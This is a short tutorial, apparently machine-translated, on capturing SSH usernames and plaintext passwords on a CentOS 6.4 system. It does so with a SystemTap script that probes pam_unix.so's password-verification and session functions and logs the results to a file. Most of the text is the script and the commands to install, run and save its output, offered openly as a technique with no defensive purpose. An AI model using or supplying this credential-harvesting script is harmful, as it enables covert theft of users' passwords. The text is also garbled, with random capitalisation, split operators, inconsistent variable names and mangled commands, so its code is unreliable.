Systemtap Monitor tool gets SSH username and password

Systemtap is a very powerful kernel debugging tool that can debug a lot of questions about the kernel layer. Linux is through the PAM module to detect user information and authentication information, so as to determine whether a user can log on to the system, using this knowledge point, using SYSTEMTAP capture pam_unix.so The dynamic library file function calls, get users in the SSH remote login username and password bar.

Test environment: CentOS6.4 32bit

Kernel version: 2.6.32-358.el6.i686

First install the following RPM package
# Yum--releasever=6.4 Update
# yum Install-y Systemtap
# Debuginfo-install $ (rpm-qf/lib/security/pam_unix.so)

Create the file and write the following code
# TOUCH/ROOT/CAPTURE_PASS.STP
#!/usr/bin/stap
Global username, pass, Issuccret = 1;
Probe process ("/lib/security/pam_unix.so"). Function ("_unix_verify_password")
{
Username = user_string ($name);
pass = user_string ($p);
}
Probe process ("/lib/security/pam_unix.so"). Function ("_unix_verify_password"). return
{
if ($return = = 0)
{
printf ("User:%s\npassword:%s\n\n", username, pass);
Issuccret = 0;
}
}
Probe process ("/lib/security/pam_unix.so"). Function ("Pam_sm_open_session")
{
if (issuccret!= 0)
{
printf ("Login via ssh service.\n\user:%s\npassword:%s\n\n", username, pass);
}
Issuccret = 1;
}



Give executable permissions
chmod +x CAPTURE_PASS.STP
Create a file that records passwords
Touch Password.txt
Execute Systemstap Script
STAP Capture_pass.stp-o Password.txt



Local execution of the CAPTURE_PASS.STP script, while SSH telnet to the system, even if the first logon failure is not a problem, will not record the error password you are trying to enter. After successful login ctl+c terminate script run, view Password.txt, successfully capture. Systemstap is a powerful tool, so only the super households can use it.